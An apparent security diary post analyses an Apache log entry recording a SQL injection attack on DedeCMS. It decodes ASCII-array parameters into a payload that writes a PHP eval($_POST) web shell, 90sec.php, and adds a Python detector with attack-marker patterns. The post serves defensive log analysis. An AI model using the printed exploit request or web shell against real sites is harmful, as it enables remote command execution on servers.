Arrays in requests, PHP and DedeCMS
We received an interesting submission about a strange-looking Apache web server log. While the log does not look malicious at first glance, after examining it carefully it certainly looks strange, as you can see below:
10.10.10.10 - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109 [snip] HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
The log shown above contains a request to the download.php PHP script with a bunch of parameters that appear to be the same. After decoding %5B and %5D to [ and ], the request becomes a bit clearer:
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98
The request above contains repeating arrs1[] parameters. PHP treats these as members of an array, so this actually creates an array called arrs1 (and later arrs2, as shown in the original log) that contains various numbers. These numbers (99, 102, 103 …) look like decimal ASCII codes, so the next step in decoding is to push the original log through a perl one-liner that replaces every code with the corresponding character:
$ perl -pe 's/(&arrs(1|2)%5B%5D=)(\d+)/chr($3)/ge' < original.log
10.10.10.10 - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'` HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
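As an added example (not part of the diary), the same decoding done the way a log-analysis script would do it: rebuild the PHP-style arrs1[]/arrs2[] arrays from the query string first, then turn each list of ASCII codes into text and flag decoded content that contains markers from this DedeCMS attack. The log line is constructed to match the diary's (arrs1[] spells cfg_dbprefix), with arrs2[] shortened to "mytag".

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample modelled on the diary's log line; arrs2[] is shortened.
SAMPLE_LOG = (
    '10.10.10.10 - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1'
    '&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95'
    '&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114'
    '&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120'
    '&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103'
    ' HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"'
)

# Request line inside the Apache combined-log quotes: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Strings from the decoded attack that should never appear in a download.php request.
MARKERS = ("cfg_", "{dede:php}", "file_put_contents", "eval(", "<?php")


def php_arrays(query):
    """Group repeated name[] parameters the way PHP builds $_GET arrays (order kept)."""
    arrays = {}
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if key.endswith("[]"):          # parse_qs already decoded %5B%5D to []
            arrays[key[:-2]] = values
    return arrays


def decode_ascii_array(values):
    """Join a list of decimal ASCII codes into text; None if any member is not a code."""
    if not values or not all(v.isdigit() and int(v) < 128 for v in values):
        return None
    return "".join(chr(int(v)) for v in values)


def analyse_log_line(line):
    """Return {array_name: decoded_text} for every numeric array in the request."""
    m = REQ_RE.search(line)
    if not m:
        return {}
    query = urlsplit(m.group("target")).query
    decoded = {}
    for name, values in php_arrays(query).items():
        text = decode_ascii_array(values)
        if text is not None:
            decoded[name] = text
    return decoded


def is_suspicious(decoded):
    """True when any decoded array carries one of the attack markers."""
    return any(mk in text for text in decoded.values() for mk in MARKERS)
```

Run over a whole access log, any request where is_suspicious() returns True is worth a closer look, and the decoded dictionary shows what the attacker was trying to inject.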
And this definitely looks malicious. After a bit of research, it turned out that this is an attack against a known vulnerability in DedeCMS, a CMS written in PHP that appears to be popular in Asia. This CMS has a pretty nasty SQL injection vulnerability that can be exploited with the request shown above.
The vulnerability exists because the CMS uses the $GLOBALS global variable, which is then further propagated into an SQL query. The resulting query, from the decoded attack above, is pretty obvious: the attacker will create a file called 90sec.php, which is a very simple PHP backdoor shell that allows the attacker to execute any command with a POST HTTP request carrying the command in the parameter called guige (visible in the decoded request above).
While in this case this was simply a way to transfer an array over a GET request, similar requests can also be used for HTTP Parameter Pollution attacks, where a single parameter is added multiple times to a GET or POST request, resulting in potentially unexpected behavior.
Additionally, as you can see in the log at the top, the User-Agent string has been set to WinHttp.WinHttpRequest, which indicates that this request was created by a script or an attack tool executed on a Windows machine.
Thanks to our reader for sending the logs, and for being alert about strange looking requests – something everyone should do.
--
@bojanz
Bojan
INFIGO IS